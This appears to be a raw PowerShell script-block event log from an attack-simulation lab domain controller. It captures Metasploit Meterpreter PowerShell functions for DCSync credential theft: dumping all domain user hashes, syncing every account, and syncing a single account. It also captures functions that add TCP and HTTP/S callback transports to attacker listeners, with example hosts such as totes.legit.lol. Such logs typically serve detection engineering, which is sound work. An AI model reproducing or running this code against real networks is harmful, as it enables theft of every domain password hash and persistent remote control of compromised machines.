4104152150x0273513Microsoft-Windows-PowerShell/Operationalwin-dc-exch01.attackrange.local11[MSF.Powershell.Meterpreter.Core]::SetInvocationPointer(0x004F15D8)62169a0b-5157-4c11-aaf7-fdded746416b 4104152150x0273507Microsoft-Windows-PowerShell/Operationalwin-dc-exch01.attackrange.local11 function Invoke-DcSyncHashDump { <# .SYNOPSIS Use the DCSync functionality to dump every user hash from the DC. This is basically attempting to be a hashdump function that works remotely and doesn't require the need to be on the DC, or to extract NTDS.dit. It is recommended that this script be invoked inside channelised shell (via powershell_shell) because it can take a while in large domains. .PARAMETER Domain Specifies the domain name that is the target of the hash dumping. .PARAMETER DomainController Specifies the domain controller to pull the values from. .PARAMETER DomainFqdn Specifies the FQDN of the domain. .PARAMETER -IncludeEmpty If set to True, then all accounts that have "empty" hashes (generally disabled or unusable accounts) will be included in the output. .PARAMETER -IncludeMachineAccounts If set to True, then all accounts that are machine accounts (accounts ending in $) will be included in the output. .INPUTS None. .OUTPUTS A collection of String instances is returned that matches the typical hashdump format. .EXAMPLE Invoke-DcSyncHashDump -Domain VICIMDOMAIN #> param( [Parameter(Mandatory=$true)] [String] [ValidateNotNullOrEmpty()] $Domain, [String] $DomainController, [String] $DomainFqdn, [Switch] $IncludeEmpty, [Switch] $IncludeMachineAccounts ) $s = New-Object MSF.Powershell.Meterpreter.Kiwi+DcSyncAllSettings $s.Domain = $Domain $s.DomainController = $DomainController $s.DomainFqdn = $DomainFqdn $s.IncludeEmpty = $IncludeEmpty $s.IncludeMachineAccounts = $IncludeMachineAccounts return [MSF.Powershell.Meterpreter.Kiwi]::DcSyncHashDump($s) }3da26a89-f6c5-4e66-933a-91657fdb4f6f 4104152150x0273501Microsoft-Windows-PowerShell/Operationalwin-dc-exch01.attackrange.local11 function Invoke-DcSyncAll { <# .SYNOPSIS Use the DCSync functionality to DCSync every user that's present in the DC. It is recommended that this script be invoked inside channelised shell (via powershell_shell) because it can take a while in large domains. .PARAMETER Domain Specifies the domain name to contact for extracting all the users from. .PARAMETER DomainController Specifies the domain controller to pull the values from. .PARAMETER DomainFqdn Specifies the FQDN of the domain. .PARAMETER -IncludeEmpty If set to True, then all accounts that have "empty" hashes (generally disabled or unusable accounts) will be included in the output. .PARAMETER -IncludeMachineAccounts If set to True, then all accounts that are machine accounts (accounts ending in $) will be included in the output. .INPUTS None. .OUTPUTS A collection of SyncRecord instances is returned. .EXAMPLE Invoke-DcSyncAll -Domain VICIMDOMAIN #> param( [Parameter(Mandatory=$true)] [String] [ValidateNotNullOrEmpty()] $Domain, [String] $DomainController, [String] $DomainFqdn, [Switch] $IncludeEmpty, [Switch] $IncludeMachineAccounts ) $s = New-Object MSF.Powershell.Meterpreter.Kiwi+DcSyncAllSettings $s.Domain = $Domain $s.DomainController = $DomainController $s.DomainFqdn = $DomainFqdn $s.IncludeEmpty = $IncludeEmpty $s.IncludeMachineAccounts = $IncludeMachineAccounts return [MSF.Powershell.Meterpreter.Kiwi]::DcSyncAll($s) }8f52b9a4-abef-400e-9de4-d507f817a505 4104152150x0273495Microsoft-Windows-PowerShell/Operationalwin-dc-exch01.attackrange.local11 function Invoke-DcSync { <# .SYNOPSIS Use the DCSync functionality to DCSync a single user from the target domain. .PARAMETER User Specifies the Domain\Username of the target user. .PARAMETER DomainController Specifies the domain controller to pull the information from. .PARAMETER DomainFqdn Specifies the FQDN of the domain. .INPUTS None. .OUTPUTS A single SyncRecord instance is returned. .EXAMPLE Invoke-DcSync -User VICIMDOMAIN\Administrator #> param( [Parameter(Mandatory=$true)] [String] [ValidateNotNullOrEmpty()] $User, [String] $DomainController, [String] $DomainFqdn ) return [MSF.Powershell.Meterpreter.Kiwi]::DcSync($User, $DomainController, $DomainFqdn) }16bdd8a7-e605-4877-86e8-3f8190d951e3 4104152150x0273489Microsoft-Windows-PowerShell/Operationalwin-dc-exch01.attackrange.local11 function Add-TcpTransport { <# .SYNOPSIS Add an active TCP transport to the current session. .PARAMETER Lhost Specifies the listener host name or IP of the machine to connect to. .PARAMETER Lport Specifies port to connect back to. .PARAMETER CommTimeout Specifies the packet communications timeout (in seconds). .PARAMETER RetryTotal Specifies the total time to retry for when the transport disconnects (in seconds). .PARAMETER RetryWait Specifies the time to wait between each retry for when the transport disconnects (in seconds). .INPUTS None. .OUTPUTS True if successful, False otherwise. .EXAMPLE Add-TcpTransport -Lhost -Lport 8000 .EXAMPLE Add-TcpTransport -Lhost totes.legit.lol -Lport 1337 #> param( [Parameter(Mandatory=$true)] [String] [ValidateNotNullOrEmpty()] $Lhost, [Parameter(Mandatory=$true)] [Int] $Lport, [Int] $CommTimeout, [Int] $RetryTotal, [Int] $RetryWait ) $t = New-Object MSF.Powershell.Meterpreter.Transport+TransportInstance $t.Url = 'tcp://{0}:{1}' -f $Lhost, $Lport $t.CommTimeout = $CommTimeout $t.RetryTotal = $RetryTotal $t.RetryWait = $RetryWait return [MSF.Powershell.Meterpreter.Transport]::Add($t) }daf5a7f1-f80a-4994-8dbd-cbfd1451a612 4104152150x0273483Microsoft-Windows-PowerShell/Operationalwin-dc-exch01.attackrange.local11 function Add-WebTransport { <# .SYNOPSIS Add a web-based transport (http/s) to the current session. .PARAMETER Url Specifies the full URL of the listener that this transport will connect to. The URL must contain all components, including scheme (http/s), domain, port (if it's a non-standard port for the scheme) and LURI. There is no need to specify the Meterpreter URI as this is generated on the fly automatically. .PARAMETER CommTimeout Specifies the packet communications timeout (in seconds). .PARAMETER RetryTotal Specifies the total time to retry for when the transport disconnects (in seconds). .PARAMETER RetryWait Specifies the time to wait between each retry for when the transport disconnects (in seconds). .PARAMETER UserAgent Specifies user agent to use when making the web requests. .PARAMETER ProxyHost Specifies host address for the proxy server, if required. .PARAMETER ProxyUser Specifies username for proxy authentication, if required. .PARAMETER ProxyPass Specifies password for proxy authentication, if required. .PARAMETER CertHash Specifies the SHA1 hash of the https server certificate (as a hex-encoded string) that is expected to be presented. .INPUTS None. .OUTPUTS True if successful, False otherwise. .EXAMPLE Add-WebTransport -Url https://foo.com/someuri .EXAMPLE Add-WebTransport -Url http://foo.com:8080/myendpoint -RetryTotal 60 -RetryWait 5 .EXAMPLE Add-WebTransport -Url https://foo.com -UserAgent 'TotesLegit (v1.0)' -CertHash 01A0EF17832F0356BD8164254BB725857465B918 #> param( [Parameter(Mandatory=$true)] [String] [ValidateNotNullOrEmpty()] $Url, [Int] $CommTimeout, [Int] $RetryTotal, [Int] $RetryWait, [String] $UserAgent, [String] $ProxyHost, [String] $ProxyUser, [String] $ProxyPass, [String] $CertHash ) # Make sure this URL is valid [System.Uri]$uri = $Url If (-not ($uri.Scheme.ToLower() -eq 'http' -Or $uri.Scheme.ToLower() -eq 'https')) { throw 'Specified scheme is invalid' } $t = New-Object MSF.Powershell.Meterpreter.Transport+TransportInstance $t.Url = $Url + [MSF.Powershell.Meterpreter.Transport]::GenerateTransportUri() $t.CommTimeout = $CommTimeout $t.UserAgent = $UserAgent $t.ProxyHost = $ProxyHost $t.ProxyUser = $ProxyUser $t.ProxyPass = $ProxyPass $t.RetryTotal = $RetryTotal $t.RetryWait = $RetryWait $t.CertHash = $CertHash return [MSF.Powershell.Meterpreter.Transport]::Add($t) } 26dd971f-e4b9-4e27-9125-d847b53e4bad